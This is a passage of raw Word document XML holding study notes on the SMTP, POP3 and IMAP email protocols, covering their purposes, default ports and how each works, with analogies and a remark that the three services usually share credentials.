        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000283F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002840">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41">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002842">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_f250q8ytwjla" w:id="351"/>
      <w:bookmarkEnd w:id="351"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">POP3, IMAP, and SMTP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002843">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002844">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TLDR: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SMTP </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sending </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">emails while </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">POP3 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IMAP </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">are for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">reading </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">receiving </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">emails</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002845">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="455"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">POP3 and IMAP are often seen together (so that users can interact with either) but you only need one</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002846">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="455"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">POP3 is older and simple; IMAP is newer and feature-rich</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002847">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002848">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">These are services commonly found on the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> mail server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002849">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000284A">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Usually you can re-use the same creds across all SMTP, POP3, and IMAP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000284B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="142"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Because all three protocols are typically backed by the same user directory (like Active Directory, LDAP, or a local mail database).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000284C">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000284D">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For POP3 and IMAP, the plaintext and SSL usually contain the same mail</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000284E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_20k7rrv8jbyx" w:id="352"/>
      <w:bookmarkEnd w:id="352"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Explaining Each</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000284F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002850">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. SMTP (Simple Mail Transfer Protocol)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002851">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1420"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose: Sending emails.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002852">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1420"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ports: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">25 (default), 465 (SSL), 587 (STARTTLS).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002853">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="300"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Flow:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002854">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="300"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Your mail client (Outlook, Thunderbird, etc.) → SMTP server → recipient’s SMTP server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002855">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="300"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SMTP is basically the “postal service” that takes a message from you and delivers it to the right mailbox server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002856">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1375"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Analogy: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Think of it as the outgoing mail truck.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002857">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002858">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. POP3 (Post Office Protocol v3) (Older and simple)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="179"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose: Retrieving email from a server to a client.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000285A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="179"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ports: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">110 (default), 995 (SSL).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000285B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="179"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000285C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="179"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When you connect with POP3, it downloads the messages from the mail server to your device.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000285D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="179"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">By default, messages are removed from the server after download (though modern clients often let you “leave a copy on server”).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000285E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="179"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Limitation:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000285F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="179"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It’s simple — one mailbox, no folders.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002860">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="179"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Great for checking mail from a single device, but poor for syncing across multiple devices.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002861">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="179"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Analogy:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Like going to the post office, grabbing all your mail, and taking it home.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002862">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002863">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. IMAP (Internet Message Access Protocol) (new and feature-rich)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002864">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="280"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose: Retrieving and managing email on a server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002865">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="280"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ports: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">143 (default), 993 (SSL).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002866">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="280"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002867">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="280"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Unlike POP3, IMAP keeps emails on the server by default.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002868">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="280"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lets you manage mail in place (folders, flags like “Seen” or “Answered”).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002869">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="280"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Syncs across devices: if you read/delete/move an email on one client, it’s reflected everywhere.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000286A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="280"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
